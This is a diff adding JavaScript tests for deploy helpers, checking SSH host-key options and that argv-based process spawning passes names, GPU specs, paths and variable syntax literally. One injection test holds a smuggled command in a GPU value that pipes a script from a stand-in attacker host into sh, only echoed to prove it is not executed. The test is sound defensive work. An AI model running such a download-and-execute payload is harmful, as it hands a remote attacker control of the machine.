@@ -123,4 +123,55 @@ describe("deploy helpers", () => {
123123 assert . equal ( out , "$(whoami)" ) ;
124124 } ) ;
125125 } ) ;
126+
127+ describe ( "runSsh" , ( ) => {
128+ // We can't call runSsh directly (it calls runArgv which exits on failure),
129+ // but we can verify the SSH_OPTS constants and the argv construction pattern
130+
131+ it ( "SSH_OPTS contains accept-new and LogLevel=ERROR" , ( ) => {
132+ assert . deepEqual ( SSH_OPTS , [
133+ "-o" , "StrictHostKeyChecking=accept-new" ,
134+ "-o" , "LogLevel=ERROR" ,
135+ ] ) ;
136+ } ) ;
137+
138+ it ( "SSH_OPTS does not contain StrictHostKeyChecking=no" , ( ) => {
139+ const joined = SSH_OPTS . join ( " " ) ;
140+ assert . ok ( ! joined . includes ( "StrictHostKeyChecking=no" ) ) ;
141+ } ) ;
142+ } ) ;
143+
144+ describe ( "runArgv security properties" , ( ) => {
145+ it ( "argv arrays pass sandbox names with hyphens literally" , ( ) => {
146+ const r = spawnSync ( "echo" , [ "my-assistant" ] , { encoding : "utf-8" , stdio : "pipe" } ) ;
147+ assert . equal ( r . stdout . trim ( ) , "my-assistant" ) ;
148+ } ) ;
149+
150+ it ( "argv arrays pass GPU specs with colons literally" , ( ) => {
151+ const r = spawnSync ( "echo" , [ "a2-highgpu-1g:nvidia-tesla-a100:1" ] , { encoding : "utf-8" , stdio : "pipe" } ) ;
152+ assert . equal ( r . stdout . trim ( ) , "a2-highgpu-1g:nvidia-tesla-a100:1" ) ;
153+ } ) ;
154+
155+ it ( "argv prevents NEMOCLAW_GPU injection via brev create" , ( ) => {
156+ // Simulate what would happen if NEMOCLAW_GPU contained injection
157+ const maliciousGpu = 'a100"; curl attacker.com/shell.sh|sh; echo "' ;
158+ const r = spawnSync ( "echo" , [ "--gpu" , maliciousGpu ] , { encoding : "utf-8" , stdio : "pipe" } ) ;
159+ // With argv, the entire string is one argument — no shell interpretation.
160+ // "attacker" appears in stdout as literal text (not executed).
161+ // The key assertion: the entire payload is passed through verbatim as
162+ // a single argv element, proving no shell splitting or interpretation.
163+ assert . ok ( r . stdout . includes ( maliciousGpu ) ) ;
164+ assert . equal ( r . stdout . trim ( ) , `--gpu ${ maliciousGpu } ` ) ;
165+ } ) ;
166+
167+ it ( "argv passes file paths with spaces literally" , ( ) => {
168+ const r = spawnSync ( "echo" , [ "/path/with spaces/file.txt" ] , { encoding : "utf-8" , stdio : "pipe" } ) ;
169+ assert . equal ( r . stdout . trim ( ) , "/path/with spaces/file.txt" ) ;
170+ } ) ;
171+
172+ it ( "argv passes environment variable syntax literally" , ( ) => {
173+ const r = spawnSync ( "echo" , [ "NVIDIA_API_KEY=${SECRET}" ] , { encoding : "utf-8" , stdio : "pipe" } ) ;
174+ assert . equal ( r . stdout . trim ( ) , "NVIDIA_API_KEY=${SECRET}" ) ;
175+ } ) ;
176+ } ) ;
126177} ) ;
0 commit comments